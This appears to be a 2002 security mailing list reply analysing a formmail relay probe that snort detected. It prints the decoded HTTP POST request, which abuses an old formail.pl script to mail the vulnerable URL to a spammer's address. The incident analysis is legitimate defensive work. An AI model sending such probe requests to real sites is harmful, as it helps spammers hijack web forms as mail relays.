Re: new type of formmail probes

["Kerry Thompson" <kerry () crypt gen nz>]

Hi Russell

I don't see any fancy unicode or DOS commands in here, so I would say it
is a relatively harmless probe for open formmail relays, probably for spam
use. There are a number of automated tools that look for old formail.pl
programs to exploit as relays. The POST translated to plain text follows (
the backslash breaks are mine for readability ) :

---------------------------------------------------------------
POST /cgi-bin/formail.pl HTTP/1.0
Via: 1.0 SERVER
Connection: Keep-Alive
Content-Length: 402
User-Agent: Mozilla/4.06 (Win95; I)
Content-Type: application/x-www-form-urlencoded
Host: www.cs.auckland.ac.nz
Accept: image/gif, image/x-xpixmap, image/jpeg, application/msword, */*
Referer: www.cs.auckland.ac.nz

email=daa18 () fdj10 com&recipient=<iikestyx () aol com>www.cs.auckland.ac.nz\
&subject=www.cs.auckland.ac.nz/cgi-bin/formail.pl              oxy52\
&=

time/date: 08:20:19pm / 09/04/2002
<A HREF="www.cs.auckland.ac.nz/cgi-bin/formail.pl">\
www.cs.auckland.ac.nz/cgi-bin/formail.pl</A>





oxy52
---------------------------------------------------------------

It seems to be probing formail and getting it to send an Email back to the
spammer containing a URL for the vulnerable formail.

I've checked Google for "oxy52" but found nothing, its probabaly just a
tag for whoever is receiving the mail.

Kerry


Russell Fulton said:
> Hi All,
>       Over the last week or so snort has been picking up many probes like
> this:
[snip]



-- 
Kerry Thompson, CISSP
Information Systems Security Consultant
http://www.crypt.gen.nz  kerry () crypt gen nz





----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com